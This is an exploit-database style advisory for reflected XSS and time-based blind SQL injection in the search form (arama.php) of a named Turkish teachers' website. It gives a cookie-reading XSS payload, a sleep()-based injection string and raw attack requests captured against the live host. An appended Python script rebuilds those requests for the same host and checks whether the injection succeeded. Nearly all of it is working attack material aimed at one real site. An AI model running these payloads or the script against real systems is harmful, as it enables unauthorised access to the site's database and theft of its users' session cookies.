# Exploit Title: ogretmenlerodasi Reflected XSS + SQL injection
# Date: 13/01/2020
# Exploit Author: Furkan Özer
# Vendor Homepage: http://ogretmenlerodasi.org.tr/
# CVE: -
# CWE: 79 (Reflected XSS), 89 (SQL injection)
----[]- Info: -[]----
http://ogretmenlerodasi.org.tr/arama.php
----[]- Reflected XSS: -[]----
Payload Sample #1: aramakelime='"()&%1<ScRiPt >prompt(930653)</ScRiPt>&buton=
Payload Sample #2: "><img src=x onerror=alert(document.cookie)>
Request
POST /arama.php HTTP/1.1
Content-Length: 86
Content-Type: application/x-www-form-urlencoded
Host: ogretmenlerodasi.org.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2
Accept: */*
aramakelime=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28930653%29%3c%2fScRiPt%3e&buton=
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2020 15:34:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.4.45
MS-Author-Via: DAV
X-Powered-By: PleskLin
Content-Length: 8766
----[]- SQL Injection (time-based blind): -[]----
URL encoded POST input aramakelime was set to 1' or (sleep(2)+1) limit 1 -- 
(MySQL/MariaDB sleep() returns 0, so the expression evaluates to 1 and the query stalls for about two seconds only if the value reaches it unescaped; the indicator is the response delay, not the response body)
Request
POST /arama.php HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Host: ogretmenlerodasi.org.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2
Accept: */*
aramakelime=1%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20&buton=
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2020 15:35:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.4.45
MS-Author-Via: DAV
X-Powered-By: PleskLin
Content-Length: 8898
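Added example (not part of the original advisory, not the author's tooling): offline checks for both findings above. It rebuilds the two POST bodies from the raw payloads and verifies the Content-Length values shown in the captured requests (86 and 73), classifies a response as reflecting the XSS marker unescaped or htmlspecialchars()-encoded, and applies the timing rule that confirms a sleep()-based blind injection. The HTML fragments and the request timings are constructed for the example; only the host, path, parameter names and payloads come from the advisory.

```python
"""Offline verification helpers for the arama.php findings (added example).

Assumptions: the two HTML fragments below stand in for a vulnerable and a
fixed search page, and the timings are constructed, not measured."""
import html
import statistics
from typing import Sequence
from urllib.parse import quote

HOST = "ogretmenlerodasi.org.tr"
PATH = "/arama.php"

XSS_PAYLOAD = "'\"()&%1<ScRiPt >prompt(930653)</ScRiPt>"
XSS_MARKER = "<ScRiPt >prompt(930653)</ScRiPt>"
SQLI_PAYLOAD = "1' or (sleep(2)+1) limit 1 -- "   # trailing space is part of the payload
SLEEP_SECONDS = 2.0


def build_body(aramakelime: str) -> str:
    """application/x-www-form-urlencoded body with both form fields.

    safe='' forces quotes, parentheses, '&', '%', '<', '>', '/', '+' and
    spaces to be percent-encoded, as in the captured requests (the hex
    digits are upper case here, lower case in the capture; length is equal)."""
    return f"aramakelime={quote(aramakelime, safe='')}&buton="


def build_request(body: str) -> str:
    """Raw HTTP/1.1 POST whose Content-Length is derived from the body."""
    headers = [
        f"POST {PATH} HTTP/1.1",
        f"Host: {HOST}",
        f"Content-Length: {len(body.encode())}",
        "Content-Type: application/x-www-form-urlencoded",
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def reflection_state(response_html: str, marker: str = XSS_MARKER) -> str:
    """'raw' if the marker is echoed as live markup, 'escaped' if only an
    entity-encoded copy of it is present, 'absent' otherwise."""
    if marker in response_html:
        return "raw"
    if html.escape(marker, quote=False) in response_html:
        return "escaped"
    return "absent"


def sleep_injection_confirmed(baseline: Sequence[float], injected: Sequence[float],
                              delay: float = SLEEP_SECONDS) -> bool:
    """Time-based verdict: injected requests must be slower than the baseline
    by most of the requested delay. Medians are compared so a single slow
    baseline request (network jitter) cannot produce a false positive."""
    gap = statistics.median(injected) - statistics.median(baseline)
    return gap >= 0.8 * delay


# Constructed fragments standing in for two versions of the search results page.
VULNERABLE_PAGE = "<p>Aranan: " + XSS_PAYLOAD + "</p>"           # echoes input as-is
FIXED_PAGE = "<p>Aranan: " + html.escape(XSS_PAYLOAD) + "</p>"   # htmlspecialchars-style

# Constructed timings in seconds: five plain searches, five with the sleep payload.
BASELINE_TIMES = [0.31, 0.29, 0.34, 0.30, 1.10]
INJECTED_TIMES = [2.35, 2.31, 2.40, 2.33, 2.36]

if __name__ == "__main__":
    print(build_request(build_body(XSS_PAYLOAD)))
    print(build_request(build_body(SQLI_PAYLOAD)))
    print(reflection_state(VULNERABLE_PAGE), reflection_state(FIXED_PAGE))
    print(sleep_injection_confirmed(BASELINE_TIMES, INJECTED_TIMES))
```

Run it as-is to print both requests with their computed Content-Length; against a live target the timing lists would be filled from repeated measurements of the plain and injected requests before calling sleep_injection_confirmed().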